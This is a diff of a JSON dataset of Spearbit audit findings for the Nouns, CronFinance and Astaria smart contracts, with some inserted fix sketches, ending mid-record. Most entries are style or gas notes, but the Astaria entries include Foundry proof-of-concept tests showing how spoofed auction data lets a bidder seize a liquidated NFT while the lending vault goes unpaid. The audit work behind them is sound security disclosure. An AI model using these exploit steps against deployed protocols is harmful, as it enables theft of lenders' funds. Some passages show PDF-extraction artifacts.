NounsDAOV3Admin.sol#L509-514: Missing an event like the one in _setForkEscrow 3. Unindexed parameters: NounsDAOEventsFork.sol: Many parameters can be indexed here", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "One-step status change for pool Admins", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Admin status can be changed in a single transaction. This may result in unintended behaviour if the incorrect address is passed.", + "title": "Prefer using __Ownable_init instead of _transferOwnership to initialize upgradable contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The upgradable NounsAuctionHouseFork and the NounsTokenFork contracts inherit the OwnableUpgradeable contract. However, inside the initialize function the ownership transfer is performed by calling the internal _transferOwnership function instead of calling __Ownable_init. This deviates from the standard approach of initializing upgradable contracts, and it can lead to issues if the OwnableUpgradeable contract changes its initialization mechanism.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "he CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively.
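Tying back to the __Ownable_init finding above, a minimal sketch of the recommended initialization (contract and parameter names are hypothetical; assumes OpenZeppelin's upgradeable contracts):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.6;

    import { OwnableUpgradeable } from "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";

    contract ForkedContract is OwnableUpgradeable {
        function initialize(address owner_) external initializer {
            // run OwnableUpgradeable's own init chain first...
            __Ownable_init();
            // ...then hand ownership to the intended owner (the deployer may be a factory)
            _transferOwnership(owner_);
        }
    }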
The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks.", + "title": "Consider emitting the address of the timelock in the ProposalQueued event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The queue function currently emits the ProposalQueued event to provide relevant information about the proposal, including the proposalId and the eta. However, it doesn't emit the timelock variable, which represents the address of the timelock responsible for executing the proposal. This could lead to confusion among users regarding the intended timelock for proposal execution.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "A partner can trigger ROC update", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A partner can trigger rook update if they return rook's current list within an update. Scenario A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns rook's rook- PartnerContractAddr and gets updated, the partner calls updateArbitrageList again, so this time isRook will be true.", + "title": "Use IERC20Upgradeable/IERC721Upgradeable for consistency with other contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Most contracts/libraries imported and used are the upgradeable variants, e.g. OwnableUpgradeable. IERC20 and IERC721 are used, which is inconsistent with the other contracts/libraries. Since the project is deployed with upgradeability enabled, it is preferable to use the Upgradeable variants of OpenZeppelin Contracts.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Approved relayer can steal cron's fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A relayer within Balancer is set per vault per address. If feeAddr will ever add a relayer within the balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass as the sender will still be feeAddr but the true msg.sender is the relayer.", + "title": "Specification says \"Pending\" state instead of \"Updatable\"", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The V3 spec says the following for \"Proposal editing\": \"The proposer account of a proposal in the PENDING state can call an updateProposal function, providing the new complete set of transactions to execute, as well as a complete new version of the proposal description text.\" This is incorrect because editing can only happen in the \"Updatable\" state, which is just before the \"Pending\" state.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Price Path Due To Long-Term Orders Neglected In Oracle Updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap.
Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2 where the price is constant between swaps), this is inaccurate - strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy.", + "title": "Typos, comments and descriptions need to be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The contract source code contains several typographical errors and misaligned comments/descriptions. Typos: 1. NounsDAOLogicV1Fork.sol#L48: adjutedTotalSupply should be adjustedTotalSupply 2. NounsDAOLogicV1Fork.sol#L80: veteor should be vetoer 3. NounsDAOV3Votes.sol#L267: objetion should be objection 4. NounsDAOExecutorProxy.sol#L24: imlemenation should be implementation Comment Discrepancies: 1. NounsDAOV3Admin.sol#L130: Should say // 6,000 basis points or 60% and not 4,000 2. NounsDAOV3Votes.sol#L219: change string 'NounsDAO::castVoteInternal: voter already voted' to 'NounsDAO::castVoteDuringVotingPeriodInternal: voter already voted' 3. NounsDAOExecutorV2.sol#L209: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin.' to 'NounsDAOExecutor::sendETH: Call must come from admin.' 4. NounsDAOExecutorV2.sol#L221: change string 'NounsDAOExecutor::executeTransaction: Call must come from admin.' to 'NounsDAOExecutor::sendERC20: Call must come from admin.' 5. NounsDAOV3DynamicQuorum.sol#L124: Should be adjusted total supply 6. NounsDAOV3DynamicQuorum.sol#L135: Should be adjusted total supply 7. NounsDAOLogicV3.sol#L902: Adjusted supply is used for minQuorumVotes() 8. NounsDAOLogicV3.sol#L909: Adjusted supply is used for maxQuorumVotes() 9. NounsDAOStorageV1Fork.sol#L33: proposalThresholdBPS is required to be exceeded, say when it is zero, one noun is needed to propose 10. NounsTokenFork.sol#L66: Typo, to be after which", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Vulnerabilities noted from npm audit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical).", + "title": "Contracts are not using the _disableInitializers function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Several Nouns-Dao contracts utilize the Initializable module provided by OpenZeppelin. To ensure that an implementation contract is not left uninitialized, it is recommended in OpenZeppelin's documentation to include the _disableInitializers function in the constructor. The _disableInitializers function automatically locks the contracts upon deployment. According to the OpenZeppelin documentation: Do not leave an implementation contract uninitialized. An uninitialized implementation contract can be taken over by an attacker, which may impact the proxy.
To prevent the implementation contract from being used, you should invoke the _disableInitializers function in the constructor to automatically lock it when it is deployed:", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Optimization: Merge CronV1Pool.sol & VirtualOrders.sol (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A lot of needless parameter passing is done to accommodate the file barrier between CronV1Pool & VirtualOrdersLib, which is an internal library. Some parameters are actually immutable variables.", + "title": "Missing or incomplete NatSpec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There are several instances throughout the codebase where NatSpec is either missing or incomplete. 1. Missing NatSpec (some functions are missing a NatSpec comment entirely): NounsDAOV3Fork.sol#L203 NounsDAOV3Votes.sol#L295 NounsDAOV3Admin.sol NounsDAOV3Proposals.sol NounsDAOExecutor.sol NounsDAOExecutorV2.sol 2. Incomplete NatSpec (some functions are missing @param tags): NounsTokenFork.sol NounsDAOV3Admin.sol NounsDAOV3Proposals.sol NounsDAOLogicV3.sol", "labels": [ "Spearbit", - "CronFinance", - "Severity: Low Risk" + "Nouns", + "Severity: Informational" ] }, { - "title": "Receive sorted tokens at creation to reduce complexity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Currently, when a pool is created, within the constructor, logic is implemented to determine if the to- kens are sorted by address. A requirement that is needed for Balancer Pool creation. This logic adds unnecessary gas consumption and complexity throughout the contract as every time amounts are retrieved from balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; Where the amountsInU112 are retrieved from the balancer as a sorted array, index 0 == token0 and index 1 == token1, but on the Cron side, we must make sure that we retrieved the correct amount based on the tokens being sent as sorted or not when the pool was created.", + "title": "Function ordering does not follow the Solidity style guide", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The recommended order of functions in Solidity, as outlined in the Solidity style guide, is as follows: constructor(), receive(), fallback(), external, public, internal and private.
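For reference, the constructor snippet that the OpenZeppelin guidance quoted above leads into with its trailing colon (a standard pattern, reproduced here as a sketch):

    /// @custom:oz-upgrades-unsafe-allow constructor
    constructor() {
        // locks the implementation contract so it can never be initialized directly
        _disableInitializers();
    }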
However, this ordering isn't enforced across the Nouns-Dao codebase.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Remove double reentrancy checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A number of CronV1Pool functions include reentrancy checks, however, they are only callable from a Balancer Vault function that already has a reentrancy check.", + "title": "Use a more recent Solidity version", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The compiler version used, 0.8.6, is quite old (current version is 0.8.20). This version was released almost two years ago and there have been five applicable bug fixes to this version since then. While it seems that those bugs don't apply to the Nouns-Dao codebase, it is advised to update the compiler to a newer version. See e.g. ERC721CheckpointableUpgradeable.sol#L46, NounsDAOExecutorV2.sol#L40, NounsDAOLog-", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a \"freezing\" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already \"correct-by- construction\", i.e. it can never underflow. The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x (cid:0) (x (cid:3) y)=(y + z) for non-negative x, y , and z, allowing subtraction operations to be unchecked, which is both a gas optimization and gives confidence the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 < (cid:0) > 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant.", + "title": "State modifications after external interactions make NounsDAOForkEscrow's returnTokensToOwner prone to reentrancy attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The external NFT call happens before the numTokensInEscrow update in returnTokensToOwner(). This looks safe (the NFT is fixed to be the noun contract and transferFrom() is used instead of the safe version, and also numTokensInEscrow = 0 in closeEscrow() acts as a control for the numTokensInEscrow -= tokenIds.length logic), but in general this type of execution-flow structuring could allow for direct stealing via reentrancy, i.e. in the presence of a callback (e.g.
an arbitrary NFT instead of the noun contract, or safeTransferFrom instead of transferFrom) and without numTokensInEscrow = 0 conflicting with numTokensInEscrow -= tokenIds.length, as an abstract example, an attacker would add the last needed noun for forking, then call withdrawFromForkEscrow() and then, being in returnTokensToOwner(), call executeFork() from the callback hook, successfully performing the fork while having already withdrawn the NFT that belongs to the DAO. NounsDAOForkEscrow.sol#L110-L125: function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO { for (uint256 i = 0; i < tokenIds.length; i++) { if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner(); >> nounsToken.transferFrom(address(this), owner, tokenIds[i]); escrowedTokensByForkId[forkId][tokenIds[i]] = address(0); } numTokensInEscrow -= tokenIds.length; } NounsDAOV3Fork.sol#L109-L130: function executeFork(NounsDAOStorageV3.StorageV3 storage ds) external returns (address forkTreasury, address forkToken) { if (isForkPeriodActive(ds)) revert ForkPeriodActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; >> uint256 tokensInEscrow = forkEscrow.numTokensInEscrow(); if (tokensInEscrow <= forkThreshold(ds)) revert ForkThresholdNotMet(); uint256 forkEndTimestamp = block.timestamp + ds.forkPeriod; (forkTreasury, forkToken) = ds.forkDAODeployer.deployForkDAO(forkEndTimestamp, forkEscrow); sendProRataTreasury(ds, forkTreasury, tokensInEscrow, adjustedTotalSupply(ds)); uint32 forkId = forkEscrow.closeEscrow(); ds.forkDAOTreasury = forkTreasury; ds.forkDAOToken = forkToken; ds.forkEndTimestamp = forkEndTimestamp; emit ExecuteFork(forkId, forkTreasury, forkToken, forkEndTimestamp, tokensInEscrow); } Direct stealing as a result of state manipulations is possible conditional on an ability to enter a callback. Given the absence of the latter at the moment, but the critical impact of the former, we consider this a best-practice recommendation and set the severity to informational.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Gas Optimizations In Bit Packing Functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The bit packing operations are heavily used throughout the gas-critical swap code path, the opti- mization of which was flagged as high-priority by the CronFi team. Thus they were carefully reviewed not just for correctness, but also for gas optimization.
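A minimal Checks-Effects-Interactions reordering of the returnTokensToOwner() excerpt quoted in the finding above (a sketch only; it keeps the report's names and simply moves the state updates ahead of the external NFT call):

    function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO {
        // effects first: clear escrow accounting before any external call
        numTokensInEscrow -= tokenIds.length;
        for (uint256 i = 0; i < tokenIds.length; i++) {
            if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner();
            escrowedTokensByForkId[forkId][tokenIds[i]] = address(0);
            // interaction last
            nounsToken.transferFrom(address(this), owner, tokenIds[i]);
        }
    }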
L119: unnecessary & due to check on L116 L175: could hardcode clearMask L203: could hardcode clearMask L240: could hardcode clearMask L241: unnecessary & due to check on line 237 L242: unnecessary & due to check on line 238 L292: could hardcode clearMask L328: could hardcode clearMask L343: unnecessary to mask when _isWord0 == true L359: unnecessary & operations due to checks on lines 356 and 357 L372: unnecessary masking L389: could hardcode clearMask L390: unnecessary & due to check on L387 L415: could 16 hardcode clearMask L416: unnecessary & operation due to check on line 413 L437: unnecessary clearMask L438: unnecessary & due to check on line 435 L464: could hardcode clearMask L465: unnecessary & due to check on line 462 Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well.", + "title": "No need to use an assembly block to get the chain ID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Currently, getChainId() uses an assembly block to get the current chain ID when constructing the domain separator. This is not needed since the block.chainid global variable already provides it.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Using extra storage slot to store two mappings of the same information", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function then the second mapping does not need to be used.", + "title": "Naming convention for interfaces is not always followed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The NounsTokenForkLike interface does not follow the standard naming convention for Solidity interfaces, which begins with an I prefix. This inconsistency can make it harder for developers to understand the purpose and usage of the contract.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Nouns", + "Severity: Informational" ] }, { - "title": "Gas optimizations within _executeVirtualOrders function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Within the _executeVirtualOrders function there are a few gas optimizations that can be applied to reduce the contract size and gas consumed while the function is called. (!(virtualOrders.lastVirtualOrderBlock < _maxBlock && _maxBlock < block.number)) Is equivalent with: (virtualOrders.lastVirtualOrderBlock >= _maxBlock || _maxBlock >= block.number) This means that this always enters if _maxBlock == block.number which will result in unnecessary gas consump- tion.
If cron fee is enabled, evoMem.feeShiftU3 will have a value meaning that the check on line 1536 is obsolete. Removing that check and the retrieve from storage will save gas.", + "title": "The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The extra data (encoded stack) provided to advanced orders to Seaport are not validated properly by the CollateralToken upon callback when validateOrder(...) is called by Seaport. When a stack/lien gets liquidated, an auction is created on Seaport with the offerer and zone set as the CollateralToken, and the order type is full restricted so that the aforementioned callback is performed at the end of fulfilment/matching orders on Seaport. An extra piece of information which needs to be provided by the fulfiller or matcher on Seaport is the extra data, which is the encoded stack. The only validation that happens during the callback is the following, to make sure that the 1st consideration's token matches the decoded stack's lien's token: ERC20 paymentToken = ERC20(zoneParameters.consideration[0].token); if (address(paymentToken) != stack.lien.token) { revert InvalidPaymentToken(); } Besides that, it does not check that this stack corresponds to the same collateralId and the same lien id. So a bidder on Seaport can take advantage of this and provide spoofed extra data as follows: 1. The borrower collateralises its NFT token and takes a lien from a public vault 2. The lien expires and a liquidator calls liquidate(...) for the corresponding stack. 3. The bidder creates a private vault and deposits 1 wei worth of WETH into it. 4. The bidder collateralises a fake NFT token and takes a lien with 1 wei worth of WETH as a loan 5. The bidder provides the encoded fake stack from step 4 as extra data to settle the auction for the real liquidated lien from step 2 on Seaport. The net result of these steps is that: The original NFT token will be owned by the bidder. The change in the sum of the ETH and WETH balances of the borrower, liquidator and the bidder would be the original borrowed amount from step 1 (might be off by a few wei due to division errors when calculating the liquidator fees). The original public vault would not receive its loan amount from the borrower or the auction amount from the Seaport liquidation auction. If the borrower, the liquidator and the bidder were the same, this entity would end up with its original NFT token plus the loaned amount from the original public vault. If the liquidator and the bidder were the same, the bidder would end up with the original NFT token and might have to pay around 1 wei due to division errors. The borrower gets to keep its loan. The public vault would not receive the loan or any portion of the amount settled in the liquidation auction.
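A sketch of the missing binding between the decoded stack and the auction being settled, alongside the payment-token check the report quotes (the auctionHash comparison is hypothetical, reusing the s.idToUnderlying storage the report mentions; ZoneParameters.orderHash is part of Seaport's zone interface):

    // inside CollateralToken.validateOrder(...), after decoding the stack from extraData:
    ILienToken.Stack memory stack = abi.decode(zoneParameters.extraData, (ILienToken.Stack));
    // existing check: the payment token must match the lien's token
    if (zoneParameters.consideration[0].token != stack.lien.token) {
        revert InvalidPaymentToken();
    }
    // missing check (sketch): the decoded stack must describe the lien actually under auction
    uint256 collateralId = stack.lien.collateralId;
    if (s.idToUnderlying[collateralId].auctionHash != zoneParameters.orderHash) {
        revert InvalidOrder(); // hypothetical error
    }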
The following diff in the test contracts is needed for the PoC to work: 5 diff --git a/src/test/TestHelpers.t.sol b/src/test/TestHelpers.t.sol index fab5fbd..5c9bfc8 100644 --- a/src/test/TestHelpers.t.sol +++ b/src/test/TestHelpers.t.sol @@ -163,7 +163,6 @@ contract ConsiderationTester is BaseSeaportTest, AmountDeriver { vm.label(address(this), \"testContract\"); } } - contract TestHelpers is Deploy, ConsiderationTester { using CollateralLookup for address; using Strings2 for bytes; @@ -1608,7 +1607,7 @@ contract TestHelpers is Deploy, ConsiderationTester { orders, new CriteriaResolver[](0), fulfillments, address(this) incomingBidder.bidder - + ); } else { consideration.fulfillAdvancedOrder( @@ -1621,7 +1620,7 @@ contract TestHelpers is Deploy, ConsiderationTester { ), new CriteriaResolver[](0), bidderConduits[incomingBidder.bidder].conduitKey, address(this) incomingBidder.bidder - + ); } delete fulfillments; The PoC: forge t --mt testScenario9 --ffi -vvv // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 8: commitToLien -> liquidate -> settle Seaport auction with mismtaching stack as an ,! extraData function testScenario9() public { TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); vm.label(address(this), \"borrowerContract\"); { // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); vm.label(publicVault, \"Public Vault\"); // lend 10 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 10 ether}), payable(publicVault) 6 ); WETH9.balanceOf(publicVault)); emit log_named_uint(\"Public vault WETH balance before commiting to a lien\", ,! emit log_named_uint(\"borrower ETH balance before commiting to a lien\", address(this).balance); emit log_named_uint(\"borrower WETH balance before commiting to a lien\", ,! WETH9.balanceOf(address(this))); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); assertEq( nft.ownerOf(tokenId), address(COLLATERAL_TOKEN), \"The bidder did not receive the collateral token after the auction end.\" ); WETH9.balanceOf(publicVault)); emit log_named_uint(\"Public vault WETH balance after commiting to a lien\", ,! emit log_named_address(\"NFT token owner\", nft.ownerOf(tokenId)); emit log_named_uint(\"borrower ETH balance after commiting to a lien\", address(this).balance); emit log_named_uint(\"borrower WETH balance after commiting to a lien\", ,! 
WETH9.balanceOf(address(this))); uint256 collateralId = tokenContract.computeId(tokenId); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, \"Strategist has incorrect share balance\" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralId), address(this), \"CollateralToken not minted to borrower\" ); // fast forward to the end of the lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); vm.label(liquidatorOne, \"liquidator 1\"); // liquidate the lien vm.startPrank(liquidatorOne); 7 emit log_named_uint(\"liquidator WETH balance before liquidation\", WETH9.balanceOf(liquidatorOne)); OrderParameters memory listedOrder = _liquidate(stack); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // --- start of the attack --- vm.label(bidder, \"bidder\"); vm.startPrank(bidder); TestNFT fakeNFT = new TestNFT(1); address fakeTokenContract = address(fakeNFT); uint256 fakeTokenId = uint256(0); vm.stopPrank(); address privateVault = _createPrivateVault( bidder, bidder ); vm.label(privateVault, \"Fake Private Vault\"); _lendToPrivateVault( PrivateLender({ addr: bidder, amountToLend: 1 wei, token: address(WETH9) }), payable(privateVault) ); vm.startPrank(bidder); // it is important that the fakeStack.lien.token is the same as the original stack's token // below deals 1 wei to the bidder which is also the fakeStack borrower (, ILienToken.Stack memory fakeStack) = _commitToLien({ vault: payable(privateVault), strategist: bidder, strategistPK: bidderPK, tokenContract: fakeTokenContract, tokenId: fakeTokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, // needs to be non-zero duration: 1 hours, // s.minLoanDuration maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 wei }), amount: 1 wei }); emit log_named_uint(\"CollateralToken WETH balance before auction end\", ,! WETH9.balanceOf(address(COLLATERAL_TOKEN))); // _bid deals 300 ether to the bidder _bid( Bidder({bidder: bidder, bidderPK: bidderPK}), listedOrder, // order paramters created for the original stack during the liquidation 100 ether, // stack.lien.details.liquidationInitialAsk 8 fakeStack ); emit log_named_uint(\"Public vault WETH balance after auction end\", WETH9.balanceOf(publicVault)); emit log_named_uint(\"borrower WETH balance after auction end\", WETH9.balanceOf(address(this))); emit log_named_uint(\"liquidator WETH balance after auction end\", WETH9.balanceOf(liquidatorOne)); emit log_named_uint(\"bidder WETH balance after auction end\", WETH9.balanceOf(bidder)); emit log_named_uint(\"bidder ETH balance before commiting to a lien\", address(bidder).balance); emit log_named_uint(\"CollateralToken WETH balance after auction end\", ,! emit log_named_address(\"bidder\", bidder); emit log_named_address(\"owner of the original collateral after auction end\", ,! 
// _removeLien is not called for collateralId assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralId), liquidatorOne, \"_removeLien is called for collateralId\" ); // WETH balance of the public vault is still 0 even after the auction assertEq( WETH9.balanceOf(publicVault), 0 ); } assertEq( nft.ownerOf(tokenId), bidder, \"The bidder did not receive the collateral token after the auction end.\" ); }", "labels": [ - "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Spearbit", + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Initializing with default value is consuming unnecessary gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Every variable declaration followed by initialization with a default value is gas consuming and obsolete. The provided line within the context is just an example.", + "title": "AstariaRouter.liquidate(...) can be called multiple times for an expired lien/stack", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The current implementation of the protocol does not have any safeguard around calling AstariaRouter.liquidate(...) only once for an expired stack/lien. Thus, when a lien expires, multiple adversaries can override many different parameters by calling this endpoint at will, in the same block or in different blocks, until one of the created auctions settles (which might never happen, as one can keep stacking these auctions with some delays to have a never-ending liquidation flow). Here is the list of storage parameters that can be manipulated: s.collateralLiquidator[stack.lien.collateralId].amountOwed in LienToken: it is possible to keep increasing this value if we stack calls to liquidate(...) with delays. s.collateralLiquidator[stack.lien.collateralId].liquidator in LienToken: this can be overwritten and would hold the last liquidator's address, so only this liquidator can claim the NFT if its corresponding auction does not settle, and it would also receive the liquidation fees. s.idToUnderlying[params.collateralId].auctionHash in CollateralToken: would hold the last created auction's order hash for the same expired lien backed by the same collateral. slope in PublicVault: if the lien is taken from a public vault, each call to liquidate(...) would reduce this value, so the slope can be made really small. s.epochData[epoch].liensOpenForEpoch in PublicVault: if the lien is taken from a public vault, each call to liquidate(...) would reduce this value, so it can be made really small or even 0, depending on the rate of this lien and the slope of the vault, due to arithmetic underflows. yIntercept in PublicVault: mixing the manipulation of the vault's slope and stacking the calls to liquidate(...) with delays, we can also manipulate yIntercept.
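A minimal guard sketch, shown only to illustrate the shape of a fix (the storage names follow the report; the error name is hypothetical): recording the liquidator once and rejecting any further liquidate(...) calls for the same collateral closes the re-liquidation path exercised by the PoC below. function liquidate(ILienToken.Stack calldata stack) external { uint256 collateralId = stack.lien.collateralId; // effects first: a second liquidation of the same collateral must revert if (s.collateralLiquidator[collateralId].liquidator != address(0)) { revert AlreadyLiquidated(collateralId); } s.collateralLiquidator[collateralId].liquidator = msg.sender; // ... existing flow: slope/yIntercept updates, Seaport listing ... }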
// add the following test case to: // file: src/test/LienTokenSettlementScenarioTest.t.sol function testScenario8() public { TestNFT nft = new TestNFT(2); address tokenContract = address(nft); uint256 tokenIdOne = uint256(0); uint256 tokenIdTwo = uint256(1); uint256 initialBalance = WETH9.balanceOf(address(this)); // create a PublicVault with a 14-day epoch address publicVault = _createPublicVault( strategistOne, strategistTwo, 14 days, 1e17 ); // lend 20 ether to the PublicVault as address(1) _lendToVault( Lender({addr: address(1), amountToLend: 20 ether}), payable(publicVault) ); uint256 vaultShares = PublicVault(payable(publicVault)).totalSupply(); // borrow 10 eth against the dummy NFT with tokenId 0 (, ILienToken.Stack memory stackOne) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdOne, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); // borrow 10 eth against the dummy NFT with tokenId 1 (, ILienToken.Stack memory stackTwo) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, 